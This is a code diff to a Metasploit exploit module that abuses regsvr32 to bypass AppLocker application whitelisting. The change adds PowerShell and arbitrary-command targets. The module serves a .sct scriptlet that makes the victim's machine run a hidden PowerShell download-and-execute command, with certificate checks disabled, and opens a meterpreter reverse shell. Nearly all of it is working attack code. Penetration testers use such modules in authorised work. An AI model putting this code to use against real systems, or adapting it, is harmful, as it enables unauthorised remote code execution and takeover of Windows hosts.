Added command option

modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb

@@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'Payload'    => 'windows/meterpreter/reverse_tcp'
         },
-      'Targets'        => [['Windows', {}]],
+      'Targets'        => [
+        ['PSH', {}],
+        ['CMD', {}]
+      ],
       'Platform'       => %w(win),
       'Arch' => [ARCH_X86, ARCH_X86_64],
       'DefaultTarget'  => 0,
@@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
         ]
     ))
+    register_options(
+      [
+        OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
+      ])
   end
 
 
@@ -66,15 +73,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def serve_sct_file
     print_status("Handling request for the .sct file from #{cli.peerhost}")
     url = get_uri
-    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
-    download_and_run = "#{ignore_cert}#{download_string}"
-    psh_command = generate_psh_command_line(
-      noprofile: true,
-      windowstyle: 'hidden',
-      command: download_and_run
-    )
-    data = gen_sct_file(psh_command)
+    case target.name
+    when 'PSH'
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+      download_and_run = "#{ignore_cert}#{download_string}"
+      psh_command = generate_psh_command_line(
+        noprofile: true,
+        windowstyle: 'hidden',
+        command: download_and_run
+      )
+      data = gen_sct_file(psh_command)
+    when 'CMD'
+      data = gen_sct_file(datastore['CMD'])
+    end
     send_response(cli, data, 'Content-Type' => 'text/plain')
   end